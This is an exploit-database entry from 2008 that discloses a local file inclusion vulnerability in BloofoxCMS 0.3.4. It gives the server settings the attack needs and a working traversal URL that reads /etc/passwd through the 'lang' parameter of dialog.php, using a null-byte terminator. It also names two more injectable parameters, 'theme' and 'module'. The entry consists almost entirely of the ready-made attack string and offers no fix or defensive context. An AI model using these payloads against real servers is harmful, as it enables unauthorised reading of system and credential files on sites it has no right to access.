[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability
# Published : 2008-12-24
# Author : fuzion
# Previous Title : ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability
# Next Title : PHPmotion <= 2.1 CSRF Vulnerability
BloofoxCMS 0.3.4
http://www.bloofox.com/
magic_quotes_gpc = Off
register_globals = On
- File Inclusion -
http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
dialog.php?theme=<lfi>
dialog.php?dialog=foo&module=<lfi>
- Seasons Greetings -
- http://nukeit.org -
# www.Syue.com [2008-12-24]